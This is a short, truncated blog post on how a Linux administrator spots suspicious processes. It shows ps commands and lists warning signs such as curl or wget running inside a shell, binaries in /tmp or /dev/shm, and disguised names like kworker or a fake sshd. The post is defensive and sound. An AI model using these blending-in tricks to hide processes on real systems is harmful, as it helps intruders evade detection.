Member-only story
How I Spot a Suspicious Process on My Linux Server (Before It Does Damage)
--
Share
One strange PID. One weird name. That’s all it takes for a compromise to start — silently.
Over the years, I’ve learned to read a process list like a detective. In this blog, I’ll share exactly what I look for when I suspect a Linux server is misbehaving — and how you can spot malicious processes before they take control.
🧠 Step 1: Always Check With ps, Not Just top
Why? Because top refreshes live and can miss fast-spawning processes.
ps aux --sort=-%cpu | headps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head
✅ What I look for:
- bash or sh running under unusual users
- Commands like curl, wget, python inside a shell
- Anything running from /tmp or /dev/shm
🧪 Step 2: Look for Process Names That Try to Blend In
Attackers love hiding in plain sight. They’ll name things like:
- [kworker/0:1]
- sshd (but fake)
- cron (but not started by root)
Top comments (0)
Some comments may only be visible to logged-in visitors. Sign in to view all comments.